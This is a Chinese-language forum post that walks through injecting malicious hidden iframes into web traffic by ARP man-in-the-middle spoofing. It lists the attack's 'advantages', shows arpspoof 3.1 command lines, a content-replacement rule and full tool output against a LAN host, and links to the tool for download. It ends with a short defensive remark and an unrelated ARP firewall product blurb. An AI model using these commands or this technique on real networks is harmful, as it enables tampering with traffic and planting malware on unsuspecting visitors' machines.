【挂马】通过arp欺骗来直接挂马
[table][color=blue]ld上有不少网友中了此招,之前已经有人说arp,对没错就是卡巴都无能为力的arp欺骗[/color][color=#008000][b][size=3]原理:[/size] [/b]
[/color][b]目的:通过arp欺骗来直接挂马[/b]
[color=red]对服务器其下网站插入类似:
<iframe src=http://www.***.com/*.htm width=0 height=0></iframe>[/color]
[b]优点[/b]:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:
1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
[b]优点[/b]:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.
[b]原理[/b]:arp中间人攻击,实际上相当于做了一次代理。
正常时候: a---->b ,a是访问的正常客户,b是要攻击的服务器,c是被我们控制的主机
arp中间人攻击时候: a---->c---->b
b---->c---->a
实际上,c在这里做了一次代理的作用
那么http请求发过来的时候,c判断下是哪个客户端发过来的包,转发给b,然后b返回http响应的时候,在http响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户a,就起到了一个挂马的作用.在这个过程中,b是没有任何感觉的,直接攻击的是正常的客户a,如果a是管理员或者是目标单位,就直接挂上马了.
[size=4][b][color=red]实例:[/size] [/b]
[/color][b]欺骗192.168.0.108访问百度网站的全过程[/b]
效果: 192.168.0.108看到的百度首页只有一句话“hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
f:\arpspoof\release>arpspoof /n
arpspoof 3.1b by cooldiyer 06-10-30
[+] replace job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定
f:\arpspoof\release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
arpspoof 3.1b by cooldiyer 06-10-30
[*]parsing rul <hea ==> hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
[*]parsing rul <hea ==> hack by cooldiyer<noframes>
[+] loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
[*]spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
[*]forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*]forwarding untouched packet of size 62
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
[*]forwarding untouched packet of size 60
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
[*]forwarding untouched packet of size 399
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
[*]forwarding untouched packet of size 60
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
applying rul <hea ==> hack by cooldiyer<noframes> # 把“<hea”替换成了“hack by cooldiyer<noframes>”
[*]done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
[*]forwarding untouched packet of size 1474
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
[*]forwarding untouched packet of size 60
[+] caught 202.108.22.43:80 -> 192.168.0.108:4304
[*]forwarding untouched packet of size 237
[+] caught 192.168.0.108:4304 -> 202.108.22.43:80
[*]forwarding untouched packet of size 60
[+] reseting ..... # ctrl+c,程序自动恢复受骗主机的arp缓存
[-] sleep 5s ............ # 5秒退出
__________________________________________________________________________________
[b]其它说明[/b]:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt[/*][*][/*]
[b][color=red]相关文件下载[/color][/b]
[url=http://201314.free.fr/attachments/200612/arpspoof.3.1.zip][color=#0000ff]http://201314.free.fr/attachments/200612/arpspoof.3.1.zip[/color][/url]
[b][color=red]辅助工具下载:查找同服务器下有多少网站的工具[/color][/b]
[url=http://soft.xishui.net/down/base/domain.exe][color=#0000ff]http://soft.xishui.net/down/base/domain.exe[/color][/url]
[color=blue]作用:如果中招,通过此工具查找出你同服务器下其它网站,看是不是都被挂<iframe ..> 了
没错,你同一个服务器下其它网站都被挂了,那ok,去叼你空间商去,叫他们提高网络安全意识,把arp欺骗干掉,至此问题解决。[/color]
[/table] arp防火墙单机版 4.1.1
软件详细信息
你的网络是否经常掉线,是否经常发生ip冲突?
你是否担心通讯数据受到监控(如msn、qq、email)?
你的网络速度是否受到网管软件限制(如聚生网管、p2p终结者)?
你是否深受各种arp攻击软件之苦(如网络执法官、网络剪刀手、局域网终结者)?
以上各种问题的根源都是arp欺骗(arp攻击)。在没有arp欺骗之前,数据流向是这样的:网关<->本机。arp欺骗之后,数据流向是这样的:网关<->攻击者(“网管”)<->本机,本机与网关之间的所有通讯数据都将流经攻击者(“网管”),所以“任人宰割”就在所难免了。
arp防火墙通过在系统内核层拦截虚假arp数据包以及主动通告网关本机正确的mac地址,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,从而完美的解决上述所有问题。
arp防火墙九大功能
1. 拦截arp攻击。
(a) 在系统内核层拦截外部虚假arp数据包,保障系统不受arp欺骗、arp攻击影响,保持网络畅通及通讯安全;
(b) 在系统内核层拦截本机对外的arp攻击数据包,以减少感染恶意程序后对外攻击给用户带来的麻烦;
2. 拦截ip冲突。在系统内核层拦截ip冲突数据包,保障系统不受ip冲突攻击的影响;
3. dos攻击抑制。在系统内核层拦截本机对外的tcp syn/udp/icmp/arp dos攻击数据包,定位恶意发动dos攻击的程序,从而保证网络的畅通;
4. 安全模式。除了网关外,不响应其它机器发送的arp request,达到隐身效果,减少受到arp攻击的几率;
5. arp数据分析。分析本机接收到的所有arp数据包,掌握网络动态,找出潜在的攻击者或中毒的机器;
6. 监测arp缓存。自动监测本机arp缓存表,如发现网关mac地址被恶意程序篡改,将报警并自动修复,以保持网络畅通及通讯安全;
7. 主动防御。主动与网关保持通讯,通告网关正确的mac地址,以保持网络畅通及通讯安全;
8. 追踪攻击者。发现攻击行为后,自动快速锁定攻击者ip地址;
9. 查杀arp病毒。发现本机有对外攻击行为时,自动定位本机感染的恶意程序、病毒程序。
下载地址:http://www.newhua.com/soft/52718.htm
页:
[1]